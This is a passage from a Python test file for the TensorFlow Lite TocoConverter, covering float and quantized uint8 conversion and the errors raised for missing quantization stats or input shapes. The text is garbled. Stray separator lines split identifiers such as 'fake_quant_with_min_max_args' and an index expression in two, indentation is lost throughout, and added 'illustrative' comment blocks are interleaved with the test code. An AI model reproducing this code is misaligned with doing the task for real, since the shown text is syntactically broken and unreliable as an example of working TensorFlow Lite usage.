sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[
|
0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
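  # Illustrative continuation (not asserted by the original test): with the
  # tensors allocated above, inference runs by setting the input, invoking the
  # interpreter, and reading the output. The shape/dtype mirror the placeholder.
  #
  #   input_data = np.ones((1, 16, 16, 3), dtype=np.float32)
  #   interpreter.set_tensor(input_details[0]['index'], input_data)
  #   interpreter.invoke()
  #   result = interpreter.get_tensor(output_details[0]['index'])
  #   # out_tensor is in_tensor + in_tensor, so result should equal 2 * input_data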
def testQuantization(self):
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA')
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')
out_tensor = array_ops.fake_quan
|
t_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name='output')
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(
sess, [in_tensor_1, in_tensor_2], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {
'inputA': (0., 1.),
'inputB': (0., 1.)
} # mean, std_dev
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((1., 0.),
input_details[0]['quantization']) # scale, zero_point
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.uint8, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((1., 0.),
input_details[1]['quantization']) # scale, zero_point
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('output', output_details[0]['name'])
self.assertEqual(np.uint8, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertTrue(output_details[0]['quantization'][0] > 0) # scale
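  # Illustrative sketch (not part of the original test): a caller maps the uint8
  # output back to real values with the (scale, zero_point) pair reported in
  # output_details[0]['quantization'], i.e. real = scale * (quantized - zero_point).
  #
  #   scale, zero_point = output_details[0]['quantization']
  #   raw = interpreter.get_tensor(output_details[0]['index'])      # uint8 values
  #   real_values = scale * (raw.astype(np.float32) - zero_point)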
def testQuantizationInvalid(self):
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA')
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name='output')
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(
sess, [in_tensor_1, in_tensor_2], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {'inputA': (0., 1.)} # mean, std_dev
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual(
'Quantization input stats are not available for input tensors '
'\'inputB\'.', str(error.exception))
def testSizeNoneInvalid(self):
in_tensor = array_ops.placeholder(dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Test invalid shape. None after 1st dimension.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual('Provide an input shape for input array \'Placeholder\'.',
str(error.exception))
def testBatchSizeInvalid(self):
in_tensor = array_ops.placeholder(
shape=[1, None, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# T
|